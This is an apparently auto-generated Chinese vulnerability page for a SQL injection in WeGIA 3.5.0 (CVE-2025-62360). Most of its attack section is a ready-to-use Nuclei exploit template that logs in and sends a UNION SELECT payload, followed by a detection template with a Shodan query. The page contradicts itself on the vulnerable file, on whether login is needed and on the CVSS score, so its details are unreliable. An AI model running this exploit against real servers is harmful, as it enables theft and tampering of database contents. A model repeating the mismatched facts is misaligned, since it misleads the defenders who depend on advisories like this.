[webapps] WeGIA 3.5.0 - SQL Injection
CVE-2025-62360
WeGIA 3.5.0 Web应用中存在SQL注入漏洞,允许未经认证的攻击者通过参数操纵执行任意SQL语句。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2025-62360 |
|---|---|
| 漏洞类型 | SQL注入 |
| 受影响版本 | WeGIA 3.5.0 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-03-03 |
| 提交者 | Onur Demir (OnurDemir-Dev) |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
在`/tutoriais/control/control_baixar.php`文件中,`id`参数直接拼接进SQL查询`$sql = 'select tutor from cadastro where id = '.$_GET['id']`,未进行任何过滤或参数化处理,导致恶意输入被直接执行。
🎯 攻击场景
1. 攻击者向目标服务器发送HTTP GET请求,访问`/tutoriais/control/control_baixar.php`,并在`id`参数中注入恶意SQL负载(如`1 UNION SELECT @@version`)。 2. 服务器执行拼接后的SQL语句,将数据库查询结果返回给攻击者。 3. 攻击者通过观察返回页面内容或时间延迟,逐步提取数据库中的敏感信息。 前置条件:目标系统运行WeGIA 3.5.0,且未对`id`参数做输入校验。 成功标志:攻击者从HTTP响应中获取到非预期的数据库内容或系统信息。
💥 漏洞影响
攻击者能够读取、修改或删除数据库中任意数据,可能导致敏感信息泄露(如用户凭证、业务数据),甚至通过`INTO OUTFILE`等语句写入webshell实现远程代码执行,或利用`xp_cmdshell`(若SQL Server)执行系统命令。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-62360-exploit
info:
name: WeGIA 3.5.0 - SQL Injection Exploit
author: onurdemir-dev
severity: high
description: WeGIA version 3.5.0 is vulnerable to SQL injection in the dependente_documento.php endpoint allowing authenticated users to extract database information.
reference:
- https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mwvv-q9gh-gwxm
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2025-62360
tags: cve,cve2025,sqli,wegia,auth
variables:
username: '{{username}}'
password: '{{password}}'
payload: 'version()'
http:
- raw:
- |
POST {{BaseURL}}/html/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="cpf"
{{username}}
------WebKitFormBoundary
Content-Disposition: form-data; name="pwd"
{{password}}
------WebKitFormBoundary--
cookie-reuse: true
matchers:
- type: word
words:
- 'home.php'
- 'location:'
condition: and
part: header
extractors:
- type: kval
part: header
kval:
- set_cookie
- raw:
- |
POST {{BaseURL}}/html/funcionario/dependente_documento.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: {{set_cookie}}
id_dependente=1 UNION SELECT 'a','b',{{payload}}#
matchers:
- type: word
words:
- '"id_doc"'
extractors:
- type: regex
part: body
regex:
- '"id_doc": *"([^"]+)"'🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-62360-detection
info:
name: WeGIA 3.5.0 - SQL Injection Detection
author: onurdemir-dev
severity: high
description: WeGIA version 3.5.0 is vulnerable to SQL injection in the dependente_documento.php endpoint.
reference:
- https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mwvv-q9gh-gwxm
tags: cve,cve2025,sqli,wegia,unauth
metadata:
max-request: 1
shodan-query: http.title:"WeGIA"
http:
- method: GET
path:
- '{{BaseURL}}/html/funcionario/dependente_documento.php'
matchers-condition: and
matchers:
- type: word
words:
- 'Dados do dependente'
- 'id_dependente'
- 'dependente_documento'
condition: and
- type: status
status:
- 200🛡️ 修复建议
升级到WeGIA 3.5.1或更高版本(官方已修复);临时措施:对`$_GET['id']`使用`intval()`强制转换为整数,或使用参数化查询(Prepared Statements)。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 07:42 | 来源: Exploit-DB